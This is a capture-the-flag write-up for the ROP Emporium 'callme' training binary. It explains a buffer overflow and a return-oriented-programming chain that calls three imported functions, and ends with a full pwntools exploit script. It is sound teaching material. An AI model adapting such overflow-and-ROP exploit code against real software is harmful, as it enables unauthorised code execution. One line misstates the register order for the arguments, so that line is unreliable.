callme

Reliably make consecutive calls to imported functions. Use some new techniques and learn about the Procedure Linkage Table.

Enumeration

Checksec:

pwndbg> checksec
File:     /home/admin/sboxshare/ropemporium/03-callme/callme
Arch:     amd64
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
RUNPATH:    b'.'
Stripped:   No

The the previous challenges, the program stops and waits for input when run:

$ ./callme
callme by ROP Emporium
x86_64

Hope you read the instructions...

>

Attack

Assuming this program also has a 32 byte buffer that is vulnerable to a buffer overflow, the only difference is the way the ROP chain needs to be built:

You must call the callme_one(), callme_two() and callme_three() functions in that order, each with the arguments 0xdeadbeef, 0xcafebabe, 0xd00df00d e.g. callme_one(0xdeadbeef, 0xcafebabe, 0xd00df00d) to print the flag. For the x86_64 binary double up those values, e.g. callme_one(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)

The logic for calling the functions remains the same as in the split challenge, except there are three functions that take three arguments each. According to the Linux x86_64 calling convention, these three arguments have to be passed in the registers RSI, RDI and RDX, which means there needs to be a gadget or combination of gadgets that carry out the following set of instructions:

pop rdi
pop rsi
pop rdx
ret

Fortunately, this sequence is available as a single gadget:

$ ropper -f callme
Gadgets
=======
...
0x000000000040093c: pop rdi; pop rsi; pop rdx; ret;
...

Combining this with the call stack logic used in split gives the following stack:

Stack top
---
11. ret
10. callme_three
9.  function arguments
8.  pop_rsi_rdi_rdx_ret
7.  callme_two
6.  function arguments
5.  pop_rsi_rdi_rdx_ret
4.  callme_one
3.  function arguments
2.  pop_rsi_rdi_rdx_ret
1.  40 byte padding
---
Stack bottom

Above, function arguments refers to the p64 packed and concatenated string of the three arguments required by the three callme functions (0xdeadbeefdeadbeef, 0xcafebabecafebabe and 0xd00df00dd00df00d).

The next step is to determine the addresses of the callme functions and inserting them into the call stack. Since the functions are lazily bound, their addresses in memory are resolved at call time, which means they can be determined by debugging the program and watching for changes in the GOT.

Alternatively, pwntools can resolve the addresses automatically through elf.symbols, which results in the following payload:

ret = p64(0x4006be)
callme_one = p64(elf.symbols['callme_one'])
callme_two = p64(elf.symbols['callme_two'])
callme_three = p64(elf.symbols['callme_three'])
args = p64(0xdeadbeefdeadbeef) + p64(0xcafebabecafebabe) + p64(0xd00df00dd00df00d)
pop_rdi_rsi_rdx = p64(0x40093c)

p.sendlineafter(b'> ', b'A'*40 + pop_rdi_rsi_rdx + args + callme_one + \
    pop_rdi_rsi_rdx + args + callme_two + \
    pop_rdi_rsi_rdx + args + callme_three + ret)
p.recv()
p.recv()
p.recv()
print(p.recvline().decode())

Attack Script

solve.py

from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
exe = "./callme"
elf = context.binary = ELF(exe)
rop = ROP(elf)
gdbscript = '''
b *pwnme+77
'''

if args.LOCAL:
    p = process(elf.path)
    if args.GDB:
        gdb.attach(p, gdbscript=gdbscript)

ret = p64(0x4006be)
callme_one = p64(elf.symbols['callme_one'])
callme_two = p64(elf.symbols['callme_two'])
callme_three = p64(elf.symbols['callme_three'])
args = p64(0xdeadbeefdeadbeef) + p64(0xcafebabecafebabe) + p64(0xd00df00dd00df00d)
pop_rdi_rsi_rdx = p64(0x40093c)

p.sendlineafter(b'> ', b'A'*40 + pop_rdi_rsi_rdx + args + callme_one + \
    pop_rdi_rsi_rdx + args + callme_two + \
    pop_rdi_rsi_rdx + args + callme_three + ret)
p.recv()
p.recv()
p.recv()
print(p.recvline().decode())